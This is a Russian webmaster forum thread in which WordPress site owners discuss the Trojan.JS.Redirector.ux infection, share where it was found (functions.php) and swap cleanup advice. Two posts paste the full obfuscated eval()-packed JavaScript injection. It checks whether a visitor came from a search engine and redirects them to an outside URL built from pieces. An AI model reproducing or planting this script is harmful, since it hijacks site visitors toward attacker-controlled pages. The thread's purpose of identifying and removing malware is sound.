X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Trojan.JS.Redirector.ux - где искать и как лечить?
Тирасполь
Тирасполь
Topic Starter сообщение 20.3.2012, 21:22; Ответить: Тирасполь
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 460
Регистрация: 1.5.2011
Из: Тирасполь
Поблагодарили: 236 раз
Репутация:   60  


За последние два дня дважды получил известие о том, что антивирусы блокируют сайт.

Проверка различными сервисами показывает, что всё нормально. Проверка папки с сайтом на хостинге также утверждает что никаких угроз нет.

Вобщем, такая зараза: Trojan.JS.Redirector.ux

Сталкиваюсь впервые. Может кому приходилось иметь с ним дело, подскажите где искать, как лечить и возможные причины заражения. Вобщем, буду рад толковым советам.

Да, сайт, который в подписи.


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ZonaObmena
ZonaObmena
сообщение 20.3.2012, 21:33; Ответить: ZonaObmena
Сообщение #2


Новичок
*

Группа: User
Сообщений: 32
Регистрация: 9.2.2012
Поблагодарили: 6 раз
Репутация:   0  


Описание у Касперского, возможно пригодится: http://www.securelist.com/ru/descriptions/12401046


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Тирасполь
Тирасполь
Topic Starter сообщение 20.3.2012, 21:38; Ответить: Тирасполь
Сообщение #3


Бывалый
****

Группа: User
Сообщений: 460
Регистрация: 1.5.2011
Из: Тирасполь
Поблагодарили: 236 раз
Репутация:   60  


ZonaObmena, да вроде это что-то другое, у Касперского даже нет описания этой модификации


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ZonaObmena
ZonaObmena
сообщение 20.3.2012, 22:07; Ответить: ZonaObmena
Сообщение #4


Новичок
*

Группа: User
Сообщений: 32
Регистрация: 9.2.2012
Поблагодарили: 6 раз
Репутация:   0  


Да я видел, но класс вирусов один и тот же. Возможно, немного полезно будет.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
serg5777
serg5777
сообщение 20.3.2012, 23:23; Ответить: serg5777
Сообщение #5


Стоп NATO
*******


Группа: Active User
Сообщений: 4321
Регистрация: 5.4.2009
Из: Ростов-на-Дону
Поблагодарили: 1333 раза
Репутация:   193  


Тут почитайте, может GreenMan уже нашёл решение проблемы.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Тирасполь
Тирасполь
Topic Starter сообщение 20.3.2012, 23:44; Ответить: Тирасполь
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 460
Регистрация: 1.5.2011
Из: Тирасполь
Поблагодарили: 236 раз
Репутация:   60  


Всем спасибо. Вроде засланец нашёлся.
Сидел в functions.php

Благо, яндекс пока не среагировал.

Вот кусок этой заразы:

Развернуть/Свернуть
"<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query
||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locati
o
n'.split('|'),0,{}))</script>"


--------------------


Поблагодарили: (2)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
GreenMan
GreenMan
сообщение 20.3.2012, 23:57; Ответить: GreenMan
Сообщение #7


Бывалый
****

Группа: User
Сообщений: 444
Регистрация: 28.6.2011
Из: Home
Поблагодарили: 80 раз
Репутация:   12  


(Тирасполь @ 20.3.2012, 22:44) *
Сидел в functions.php

У меня такое же было 3 дня назад сразу на 3-х сайтах. Нашел, удалил, но сегодня Яндекс обнаруживает еще какой-то вредоносный код на двух других сайтах, проверил functions.php - уже ничего нет и больше ничего не могу найти. sad.gif
Какая-то атака мать их. censored.gif


--------------------
- вэбмастер-энтузиаст -
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Тирасполь
Тирасполь
Topic Starter сообщение 21.3.2012, 1:02; Ответить: Тирасполь
Сообщение #8


Бывалый
****

Группа: User
Сообщений: 460
Регистрация: 1.5.2011
Из: Тирасполь
Поблагодарили: 236 раз
Репутация:   60  


GreenMan, сегодня довелось услышать, что он во всех php-файлах прописывается. Посмотрел у себя, оказалось нет. Хоть это хорошо. Я, впринципе, уверен, что он ещё полезет. Главное, чтобы с наименьшими потерями победить это зло.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ushi_dizel
ushi_dizel
сообщение 5.4.2012, 17:44; Ответить: ushi_dizel
Сообщение #9


Новичок
*

Группа: Viewer
Сообщений: 3
Регистрация: 1.12.2010
Поблагодарили: 0 раз
Репутация:   0  


Если во всех, то во всех index.php, например. Также может прописаться во всех файлах .js, и не только скриптах темы, но и всего wordpress. Поэтому, чем быстрее вылечить , тем лучше.

Касательно этого трояна, может пригодится: Найти и удалить Trojan.JS.Redirector.ux. Новое имя старого знакомого
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ropique
ropique
сообщение 9.4.2012, 11:20; Ответить: ropique
Сообщение #10


Бывалый
****

Группа: User
Сообщений: 377
Регистрация: 29.10.2011
Из: bba8ae
Поблагодарили: 38 раз
Репутация:   20  


У меня та же проблема(( вот в в файле funkcions есть такой код. Это он??
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query
||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locati
o
n'.split('|'),0,{}))</script>";


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Как мошенники зарабатывают на прямых трансляциях в Instagram
Не ждите порно в инстаграм, его нет
4 PostBrigada 620 Сегодня, 17:36
автор: spomoni
Горячая тема (нет новых ответов) Черный список обменников и как безопасно обменять валюту
140 Kurses 29693 Сегодня, 16:20
автор: BestExchangers
Открытая тема (нет новых ответов) Как пройти модерацию в Яндекс Директ, тематика Майнеры криптовалюты
3 rownong27 1073 Сегодня, 15:59
автор: RICHHost
Горячая тема (нет новых ответов) Как заработать новичку?
107 Emeralda 17755 Сегодня, 14:59
автор: Smspva
Горячая тема (нет новых ответов) Как заставить Google любить тебя?
Хочу роста трафа из Гугла : ))
73 Aslan88 16271 Сегодня, 14:48
автор: coremission


 



RSS Текстовая версия Сейчас: 12.12.2017, 18:22
Дизайн